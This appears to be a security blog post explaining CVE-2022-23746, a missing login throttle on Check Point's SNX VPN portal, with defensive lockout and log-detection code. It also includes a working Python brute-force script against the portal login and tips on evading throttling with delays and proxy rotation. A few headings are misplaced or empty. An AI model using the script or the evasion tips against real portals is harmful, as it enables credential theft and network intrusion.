In 2022, a vulnerability was disclosed in the Check Point Firewall's IPsec VPN blade, affecting the SSL Network Extender (SNX) portal. Tracked as CVE-2022-23746, it allows attackers to brute-force user credentials, potentially leading to full VPN access. In this post, we'll break down the vulnerability, show how it works, and provide code snippets to demonstrate a possible brute-force attack for educational purposes.
What’s the SNX Portal?
The SSL Network Extender (SNX) portal is a web interface of Check Point firewalls used to download VPN clients and log in with a username and password. It’s a trusted entry point for remote access, giving employees and partners a safe way into the network—if secured properly.
The Vulnerability Details
SNX's web portal (typically reachable at https://<firewall-ip>/Login/Login or /sslvpn/Login/Login) does not implement any effective protection against repeated login attempts. When the portal is configured to authenticate with just a username and password (no tokens or multi-factor), an attacker can send as many login requests as they like: every attempt is evaluated and none of them trigger a lockout or throttle. That means a determined attacker can try password after password until one works.
What should happen:
After a small number of failed logins (typically 3–5), the account or the source IP is locked out for some time, and further attempts are rejected without being evaluated.
What actually happens:
No lockout or throttling is applied. Each attempt is evaluated exactly like the first, so the only limit on the attacker is how fast the portal answers.
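To make the missing control concrete, here is an added example (written for this post, not Check Point's code): a login handler with no throttling, which behaves the way the post describes the SNX portal, beside the same credential check wrapped in a failure counter keyed by account and by source IP with a temporary lockout. The class and function names, the thresholds, and the user store are hypothetical and constructed for the example.

```python
"""Added example, not Check Point's code: the guard the SNX portal lacks.

vulnerable_login() evaluates every attempt it is given, which is the
behaviour the post describes. LoginGuard wraps the same credential check
with failure counting per account and per source IP plus a temporary
lockout, which is what the post says should happen. Names, thresholds and
the user store are hypothetical/constructed for this example."""
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

PBKDF2_ROUNDS = 20_000  # lowered for the demo; use a much higher count in production


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Constructed user store: username -> (salt, pbkdf2 hash)
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash_password("correct horse battery staple", _SALT))}


def check_credentials(username: str, password: str) -> bool:
    rec = USERS.get(username)
    if rec is None:
        _hash_password(password, bytes(16))  # burn the same time for unknown users
        return False
    salt, stored = rec
    return hmac.compare_digest(_hash_password(password, salt), stored)


def vulnerable_login(username: str, password: str) -> bool:
    """No throttling: the 10,000th guess is treated exactly like the first."""
    return check_credentials(username, password)


class ManualClock:
    """Deterministic clock so lockout expiry can be exercised without sleeping."""

    def __init__(self, start: float = 0.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


class LoginGuard:
    """Sliding-window failure counter with lockout, keyed by account and by source IP."""

    def __init__(self, max_failures=5, window=300, lockout=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window      # seconds over which failures are counted
        self.lockout = lockout    # seconds a key stays locked once the threshold is hit
        self.clock = clock
        self._failures = defaultdict(deque)   # key -> timestamps of recent failures
        self._locked_until = {}               # key -> time the lockout expires

    def _recent_failures(self, key, now):
        q = self._failures[key]
        while q and now - q[0] > self.window:
            q.popleft()
        return q

    def is_locked(self, key, now) -> bool:
        until = self._locked_until.get(key)
        return until is not None and now < until

    def login(self, username: str, source_ip: str, password: str) -> str:
        """Returns 'ok', 'denied' (bad credentials) or 'locked' (not even evaluated)."""
        now = self.clock()
        keys = (f"user:{username}", f"ip:{source_ip}")
        if any(self.is_locked(k, now) for k in keys):
            return "locked"
        if check_credentials(username, password):
            for k in keys:
                self._failures.pop(k, None)
            return "ok"
        for k in keys:
            q = self._recent_failures(k, now)
            q.append(now)
            if len(q) >= self.max_failures:
                self._locked_until[k] = now + self.lockout
        return "denied"


def simulate(guard: LoginGuard, wordlist, username="alice", src="203.0.113.7"):
    """Run one wordlist through both handlers; returns (hits without guard, outcomes with guard)."""
    unguarded_hits = [pw for pw in wordlist if vulnerable_login(username, pw)]
    guarded = [guard.login(username, src, pw) for pw in wordlist]
    return unguarded_hits, guarded


if __name__ == "__main__":
    wl = ["123456", "password", "admin", "letmein", "welcome", "qwerty",
          "correct horse battery staple"]
    print(simulate(LoginGuard(clock=ManualClock()), wl))
```

Against the seven-word list the unguarded handler finds the real password on the last try; the guarded one locks the account and the source IP after the fifth failure, so the correct password is never evaluated. Keying on the source IP as well as the account also stops one host from walking a username list. The caveat: a window-based counter still lets an attacker who paces guesses below the threshold (one every few minutes, from rotating addresses) keep going indefinitely, which is why the post's advice to require a second factor matters even once throttling is in place.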
Original Disclosure and References
- NVD Entry: CVE-2022-23746
- Check Point Security Advisory (sk176468)
- Exploit-DB Reference
- Pick or guess a target username.
- Try huge lists of common/known/guessed passwords.
Example Brute Force Python Script
Below is an example of how an attacker might automate login attempts. This script is for educational demonstration only.
import urllib3
import requests

# verify=False below emits an InsecureRequestWarning on every request; silence it once
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = "https://vpn-victim.example.com/sslvpn/Login/Login"
username = "admin"  # Replace with a list of usernames if necessary

with open("passwords.txt") as pwfile:
    passwords = [line.strip() for line in pwfile if line.strip()]

for password in passwords:
    # Form field names must match the portal's login form; these are the names this post assumes
    data = {
        'username': username,
        'password': password,
    }
    try:
        response = requests.post(url, data=data, verify=False, allow_redirects=False, timeout=10)
        # Success heuristic: a welcome page or a redirect. Many portals also redirect on
        # failure, so confirm the heuristic with a known-bad password before trusting it.
        if "Welcome" in response.text or response.status_code == 302:
            print(f"[+] Success! Username: {username} | Password: {password}")
            break
        else:
            print(f"[-] Failed: {password}")
    except requests.RequestException as ex:
        print(f"[!] Error: {ex}")
A real attack would add delays and proxy rotation to stay under any per-IP throttling that is in place, and would enumerate usernames rather than guessing a single one, but this gives the big picture.
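From the defender's side, the delays and proxy rotation just mentioned are exactly what a naive "N failures from one IP" rule misses. The following is an added example (not from the original post) of three sliding-window rules over portal login logs: one-source hammering, one account hit from several sources, and one source trying many accounts. The log line format, field names and the sample records are constructed for this example; map them to whatever your gateway actually emits.

```python
"""Added example, not from the original post: three sliding-window rules that
flag a brute-force run in portal login logs, including one that paces its
attempts and rotates source IPs. The log format, field names and sample
records are constructed for this example; map them to what your gateway
actually emits."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sslvpn: login (?P<result>failed|ok) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample: bob typos once then succeeds; 'alice' is hit from four
# rotating IPs 90 s apart; 192.0.2.50 sprays six accounts in six seconds.
SAMPLE_LOG = """\
2022-11-30T19:15:02Z vpn-fw sslvpn: login failed user=bob src=198.51.100.4
2022-11-30T19:15:09Z vpn-fw sslvpn: login ok user=bob src=198.51.100.4
2022-11-30T19:16:00Z vpn-fw sslvpn: login failed user=alice src=203.0.113.7
2022-11-30T19:17:30Z vpn-fw sslvpn: login failed user=alice src=203.0.113.8
2022-11-30T19:19:00Z vpn-fw sslvpn: login failed user=alice src=203.0.113.9
2022-11-30T19:20:30Z vpn-fw sslvpn: login failed user=alice src=203.0.113.10
2022-11-30T19:21:01Z vpn-fw sslvpn: login failed user=admin src=192.0.2.50
2022-11-30T19:21:02Z vpn-fw sslvpn: login failed user=carol src=192.0.2.50
2022-11-30T19:21:03Z vpn-fw sslvpn: login failed user=dave src=192.0.2.50
2022-11-30T19:21:04Z vpn-fw sslvpn: login failed user=erin src=192.0.2.50
2022-11-30T19:21:05Z vpn-fw sslvpn: login failed user=frank src=192.0.2.50
2022-11-30T19:21:06Z vpn-fw sslvpn: login failed user=grace src=192.0.2.50
this line is not a login record and is ignored
""".splitlines()


def parse_line(line: str):
    """Returns a dict for a login record, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "result": m["result"],
        "user": m["user"],
        "src": m["src"],
    }


def detect_bruteforce(lines, window_seconds=600, max_failures_per_ip=10,
                      max_ips_per_user=3, max_users_per_ip=5):
    """Replays failed logins in time order and returns sorted (rule, key) alerts."""
    events = [e for e in map(parse_line, lines) if e and e["result"] == "failed"]
    events.sort(key=lambda e: e["ts"])
    per_ip = defaultdict(list)    # src  -> failures inside the window
    per_user = defaultdict(list)  # user -> failures inside the window
    alerts = set()

    def within_window(bucket, now):
        # drop failures older than the window before counting
        while bucket and (now - bucket[0]["ts"]).total_seconds() > window_seconds:
            bucket.pop(0)
        return bucket

    for e in events:
        now = e["ts"]
        ip_hist = within_window(per_ip[e["src"]], now)
        ip_hist.append(e)
        user_hist = within_window(per_user[e["user"]], now)
        user_hist.append(e)
        # Rule 1: classic hammering from one source
        if len(ip_hist) >= max_failures_per_ip:
            alerts.add(("many_failures_from_ip", e["src"]))
        # Rule 2: one account attacked from several sources (proxy rotation)
        if len({x["src"] for x in user_hist}) >= max_ips_per_user:
            alerts.add(("account_targeted_from_many_ips", e["user"]))
        # Rule 3: one source trying many accounts (spraying / username enumeration)
        if len({x["user"] for x in ip_hist}) >= max_users_per_ip:
            alerts.add(("many_accounts_from_ip", e["src"]))
    return sorted(alerts)


if __name__ == "__main__":
    for rule, key in detect_bruteforce(SAMPLE_LOG):
        print(f"ALERT {rule}: {key}")
```

On the sample, rule 2 catches the rotated attack on alice and rule 3 catches the spray from 192.0.2.50, while rule 1 sees nothing because no single address fails ten times. Shrink the window to two minutes and the 90-second pacing slips past rule 2 too, which is the point of the attacker's delays: the detection window has to be sized against realistic pacing, not just bursts. Rule 2 depends on the gateway logging the attempted username for failures, and it should alert rather than auto-block, since locking the targeted account hands the attacker a denial of service against the victim.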
Once an attacker holds valid VPN credentials, they could reach internal servers, escalate privileges, or deploy ransomware.
What’s more:
Conclusion
CVE-2022-23746 shows how one missing control, login throttling and lockout on a remote-access portal, can put an entire company at risk. Never rely on a username and password alone for remote access. Apply Check Point's fix to your VPN gateways and treat multi-factor authentication as a must-have for the SNX portal.
Further Reading
- Check Point's Full Advisory (sk176468)
- NVD - CVE-2022-23746
- SANS - The Brute Force Problem in VPN Portals
Stay secure, update frequently, and always keep an eye on remote access portals!
Timeline
Published on: 11/30/2022 19:15:00 UTC
Last modified on: 12/06/2022 15:49:00 UTC